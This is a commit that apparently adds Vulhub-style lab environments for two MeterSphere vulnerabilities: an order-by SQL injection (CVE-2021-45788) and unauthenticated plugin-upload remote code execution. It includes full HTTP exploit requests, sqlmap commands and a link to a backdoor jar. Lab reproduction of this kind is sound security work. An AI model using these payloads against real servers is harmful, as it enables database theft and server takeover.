first commit

metersphere/CVE-2021-45788/README.md

@@ -0,0 +1,60 @@
+# MeterSphere v1.15.4 Authenticated SQL Injection (CVE-2021-45788)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+MeterSphere is a one-stop open source continuous testing platform under the GPL v3 open source license.
+
+In the version v1.15.4 and before, MeterSphere's testcase related APIs have order-by based SQL injection.
+
+References:
+
+- <https://github.com/metersphere/metersphere/issues/8651>
+
+## Vulnerable environment
+
+Execute following command to start a MeterSphere server v1.15.4:
+
+```
+docker compose up -d
+```
+
+After the server is fully initialized, you can see the login page of MeterSphere on `http://your-ip:8081`.
+
+## Exploit
+
+Firstly, login to the panel by username `admin` and password `metersphere`.
+
+Add a new testcase at `http://your-ip:8081/#/track/case/all`:
+
+![](1.png)
+
+Then, send the following request to test if SQL injection exists (replace csrf token and session id with yours):
+
+```
+POST /test/case/list/1/10 HTTP/1.1
+Host: localhost.lan:8081
+Content-Length: 3142
+Accept: application/json, text/plain, */*
+CSRF-TOKEN: [Your CSRF Token]
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Content-Type: application/json
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
+Cookie: MS_SESSION_ID=[Your Session ID]
+Connection: close
+
+{"orders":[{"name":"name","type":",if(1=1,sleep(2),0)"}],"components":[{"key":"name","name":"MsTableSearchInput","label":"commons.name","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"tags","name":"MsTableSearchInput","label":"commons.tag","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"module","name":"MsTableSearchInput","label":"test_track.case.module","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"priority","name":"MsTableSearchSelect","label":"test_track.case.priority","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"P0","value":"P0"},{"label":"P1","value":"P1"},{"label":"P2","value":"P2"},{"label":"P3","value":"P3"}],"props":{"multiple":true}},{"key":"createTime","name":"MsTableSearchDateTimePicker","label":"commons.create_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"updateTime","name":"MsTableSearchDateTimePicker","label":"commons.update_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"creator","name":"MsTableSearchSelect","label":"api_test.creator","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"},{"label":"commons.adv_search.operators.current_user","value":"current user"}]},"options":{"url":"/user/list","labelKey":"name","valueKey":"id"},"props":{"multiple":true}},{"key":"reviewStatus","name":"MsTableSearchSelect","label":"test_track.review_view.execute_result","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"test_track.review.prepare","value":"Prepare"},{"label":"test_track.review.pass","value":"Pass"},{"label":"test_track.review.un_pass","value":"UnPass"}],"props":{"multiple":true}}],"filters":{"reviewStatus":["Prepare","Pass","UnPass"]},"planId":"","nodeIds":[],"selectAll":false,"unSelectIds":[],"selectThisWeedData":false,"selectThisWeedRelevanceData":false,"caseCoverage":null}
+```
+
+As you can see, a 2 seconds sleep successful:
+
+![](2.png)
+
+Use SQLMap to retrieve the database username:
+
+```
+python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3
+python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3 --current-user
+```
+
+![](3.png)

metersphere/CVE-2021-45788/README.zh-cn.md

@@ -0,0 +1,56 @@
+# MeterSphere v1.15.4 认证用户SQL注入漏洞（CVE-2021-45788）
+
+MeterSphere是基于GPLv3协议的一站式的开源持续测试平台。在其1.15.4版本及以前，testcase相关API存在一处基于Order by的SQL注入漏洞。
+
+参考链接：
+
+- <https://github.com/metersphere/metersphere/issues/8651>
+
+## 漏洞环境
+
+执行如下命令启动一个MeterSphere 1.15.4服务器：
+
+```
+docker compose up -d
+```
+
+MeterSphere初始化成功后，访问`http://your-ip:8081`即可跳转到默认登录页面。
+
+## 漏洞复现
+
+首先，使用账号`admin`和密码`metersphere`来登录用户界面。
+
+在`http://your-ip:8081/#/track/case/all`创建一个新的测试用例：
+
+![](1.png)
+
+然后，发送如下数据包测试SQL注入漏洞（将其中的csrf token和session id替换成你自己的）：
+
+```
+POST /test/case/list/1/10 HTTP/1.1
+Host: localhost.lan:8081
+Content-Length: 3142
+Accept: application/json, text/plain, */*
+CSRF-TOKEN: [Your CSRF Token]
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Content-Type: application/json
+Accept-Encoding: gzip, deflate, br
+Accept-Language: en,zh-CN;q=0.9,zh;q=0.8,en-US;q=0.7
+Cookie: MS_SESSION_ID=[Your Session ID]
+Connection: close
+
+{"orders":[{"name":"name","type":",if(1=1,sleep(2),0)"}],"components":[{"key":"name","name":"MsTableSearchInput","label":"commons.name","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"tags","name":"MsTableSearchInput","label":"commons.tag","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"module","name":"MsTableSearchInput","label":"test_track.case.module","operator":{"value":"like","options":[{"label":"commons.adv_search.operators.like","value":"like"},{"label":"commons.adv_search.operators.not_like","value":"not like"}]}},{"key":"priority","name":"MsTableSearchSelect","label":"test_track.case.priority","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"P0","value":"P0"},{"label":"P1","value":"P1"},{"label":"P2","value":"P2"},{"label":"P3","value":"P3"}],"props":{"multiple":true}},{"key":"createTime","name":"MsTableSearchDateTimePicker","label":"commons.create_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"updateTime","name":"MsTableSearchDateTimePicker","label":"commons.update_time","operator":{"options":[{"label":"commons.adv_search.operators.between","value":"between"},{"label":"commons.adv_search.operators.gt","value":"gt"},{"label":"commons.adv_search.operators.ge","value":"ge"},{"label":"commons.adv_search.operators.lt","value":"lt"},{"label":"commons.adv_search.operators.le","value":"le"},{"label":"commons.adv_search.operators.equals","value":"eq"}]}},{"key":"creator","name":"MsTableSearchSelect","label":"api_test.creator","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"},{"label":"commons.adv_search.operators.current_user","value":"current user"}]},"options":{"url":"/user/list","labelKey":"name","valueKey":"id"},"props":{"multiple":true}},{"key":"reviewStatus","name":"MsTableSearchSelect","label":"test_track.review_view.execute_result","operator":{"options":[{"label":"commons.adv_search.operators.in","value":"in"},{"label":"commons.adv_search.operators.not_in","value":"not in"}]},"options":[{"label":"test_track.review.prepare","value":"Prepare"},{"label":"test_track.review.pass","value":"Pass"},{"label":"test_track.review.un_pass","value":"UnPass"}],"props":{"multiple":true}}],"filters":{"reviewStatus":["Prepare","Pass","UnPass"]},"planId":"","nodeIds":[],"selectAll":false,"unSelectIds":[],"selectThisWeedData":false,"selectThisWeedRelevanceData":false,"caseCoverage":null}
+```
+
+可见，成功演示了2秒左右：
+
+![](2.png)
+
+使用SQLMap来获取数据库用户信息：
+
+```
+python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3
+python sqlmap.py -r req.txt --dbms mysql --technique T --prefix , --level 3 --current-user
+```
+
+![](3.png)

metersphere/CVE-2021-45788/docker-compose.yml

@@ -0,0 +1,32 @@
+version: "2.1"
+services:
+  web:
+    image: vulhub/metersphere:1.15.4
+    ports:
+      - "8081:8081"
+      - "5005:5005"
+    environment:
+      MYSQL_SERVER: db:3306
+      MYSQL_DB: metersphere
+      MYSQL_USERNAME: root
+      MYSQL_PASSWORD: root
+      KAFKA_SERVER: kafka:9092
+  db:
+    image: mysql:5.7
+    command: --sql-mode="STRICT_TRANS_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION" --max-connections=8000
+    environment:
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=metersphere
+  kafka:
+    image: bitnami/kafka:3.4.1
+    environment:
+      # KRaft settings
+      - KAFKA_CFG_NODE_ID=0
+      - KAFKA_CFG_PROCESS_ROLES=controller,broker
+      - KAFKA_CFG_CONTROLLER_QUORUM_VOTERS=0@kafka:9093
+      # Listeners
+      - KAFKA_CFG_LISTENERS=PLAINTEXT://:9092,CONTROLLER://:9093
+      - KAFKA_CFG_ADVERTISED_LISTENERS=PLAINTEXT://:9092
+      - KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CONTROLLER:PLAINTEXT,PLAINTEXT:PLAINTEXT
+      - KAFKA_CFG_CONTROLLER_LISTENER_NAMES=CONTROLLER
+      - KAFKA_CFG_INTER_BROKER_LISTENER_NAME=PLAINTEXT

metersphere/plugin-rce/README.md

@@ -0,0 +1,79 @@
+# MeterSphere Plugin Endpoint Remote Code Execution
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+MeterSphere is a one-stop open source continuous testing platform under the GPL v3 open source license.
+
+In the version v1.16.3 and before, MeterSphere's plugin API is unauthenticated and the attackers are able to upload plugins to the server and execute arbitrary code.
+
+References:
+
+- <https://xz.aliyun.com/t/10772>
+
+## Vulnerable environment
+
+Execute following command to start a MeterSphere server v1.16.3:
+
+```
+docker compose up -d
+```
+
+After the server is fully initialized, you can see the login page of MeterSphere on `http://your-ip:8081`.
+
+## Exploit
+
+Firstly, by visiting `http://your-ip:8081/plugin/list`, you can see that the success message is returned without being redirected to the login page, indicating that the plugin API can be accessed without authorization.
+
+![](1.png)
+
+Then, you should create a crafted evil plugin. Vulhub prepares a pre-built backdoor jar for it: <https://github.com/vulhub/metersphere-plugin-Backdoor/releases/tag/v1.1.0>.
+
+Upload the evil jar plugin to `/plugin/add` interface:
+
+```
+POST /plugin/add HTTP/1.1
+Host: localhost:8081
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJV2KX1EL5qmKWXsd
+Content-Length: 11985
+
+------WebKitFormBoundaryJV2KX1EL5qmKWXsd
+Content-Disposition: form-data; name="file"; filename="Evil.jar"
+
+[Paste your jar file]
+------WebKitFormBoundaryJV2KX1EL5qmKWXsd--
+
+```
+
+![](2.png)
+
+> **Take care of bytes encoding by yourself if you use Burpsuite to send the package.**
+
+Althrough there is an error message is respond, the JAR package path is already added into URL classloader which means we can exploit it.
+
+Use following request to execute arbitrary command:
+
+```
+POST /plugin/customMethod HTTP/1.1
+Host: localhost:8081
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/json
+Content-Length: 89
+
+{
+  "entry": "org.vulhub.Evil",
+  "request": "id"
+}
+```
+
+![](3.png)

metersphere/plugin-rce/README.zh-cn.md

@@ -0,0 +1,74 @@
+# MeterSphere 插件接口未授权访问及远程代码执行
+
+MeterSphere是基于GPLv3协议的一站式的开源持续测试平台。在其1.16.3版本及以前，插件相关管理功能未授权访问，导致攻击者可以通过上传插件的方式在服务器中执行任意代码。
+
+参考连接：
+
+- <https://xz.aliyun.com/t/10772>
+
+## 漏洞环境
+
+执行如下命令启动一个MeterSphere 1.16.3服务器：
+
+```
+docker compose up -d
+```
+
+MeterSphere初始化成功后，访问`http://your-ip:8081`即可跳转到默认登录页面。
+
+## 漏洞复现
+
+首先，我们访问`http://your-ip:8081/plugin/list`可见成功返回插件信息（虽然此时插件为空），说明`/plugin/*`接口存在未授权访问问题，可以利用。
+
+![](1.png)
+
+利用漏洞前，需要准备一个恶意MeterSphere插件。Vulhub提供了一个已经编译好的[插件](https://github.com/vulhub/metersphere-plugin-Backdoor/releases/tag/v1.1.0)以供测试（**请勿在非授权环境下测试**）。
+
+将恶意插件使用如下数据包上传：
+
+```
+POST /plugin/add HTTP/1.1
+Host: localhost:8081
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJV2KX1EL5qmKWXsd
+Content-Length: 11985
+
+------WebKitFormBoundaryJV2KX1EL5qmKWXsd
+Content-Disposition: form-data; name="file"; filename="Evil.jar"
+
+[Paste your jar file]
+------WebKitFormBoundaryJV2KX1EL5qmKWXsd--
+```
+
+![](2.png)
+
+> **如果使用Burpsuite来复现漏洞，你需要注意数据包编码问题，否则可能将无法复现。**
+
+虽然这次上传会返回错误信息，但实际上恶意JAR包已经成功被添加进系统ClassLoader中。
+
+发送如下数据包来执行`org.vulhub.Evil`类中的恶意代码：
+
+```
+POST /plugin/customMethod HTTP/1.1
+Host: localhost:8081
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: application/json
+Content-Length: 89
+
+{
+  "entry": "org.vulhub.Evil",
+  "request": "id"
+}
+```
+
+![](3.png)

metersphere/plugin-rce/docker-compose.yml

@@ -0,0 +1,32 @@
+version: "2.1"
+services:
+  web:
+    image: vulhub/metersphere:1.16.3
+    ports:
+      - "8081:8081"
+      - "5005:5005"
+    environment:
+      MYSQL_SERVER: db:3306
+      MYSQL_DB: metersphere
+      MYSQL_USERNAME: root
+      MYSQL_PASSWORD: root
+      KAFKA_SERVER: kafka:9092
+  db:
+    image: mysql:5.7
+    command: --sql-mode="STRICT_TRANS_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION" --max-connections=8000
+    environment:
+    - MYSQL_ROOT_PASSWORD=root
+    - MYSQL_DATABASE=metersphere
+  kafka:
+    image: bitnami/kafka:3.4.1
+    environment:
+      # KRaft settings
+      - KAFKA_CFG_NODE_ID=0
+      - KAFKA_CFG_PROCESS_ROLES=controller,broker
+      - KAFKA_CFG_CONTROLLER_QUORUM_VOTERS=0@kafka:9093
+      # Listeners
+      - KAFKA_CFG_LISTENERS=PLAINTEXT://:9092,CONTROLLER://:9093
+      - KAFKA_CFG_ADVERTISED_LISTENERS=PLAINTEXT://:9092
+      - KAFKA_CFG_LISTENER_SECURITY_PROTOCOL_MAP=CONTROLLER:PLAINTEXT,PLAINTEXT:PLAINTEXT
+      - KAFKA_CFG_CONTROLLER_LISTENER_NAMES=CONTROLLER
+      - KAFKA_CFG_INTER_BROKER_LISTENER_NAME=PLAINTEXT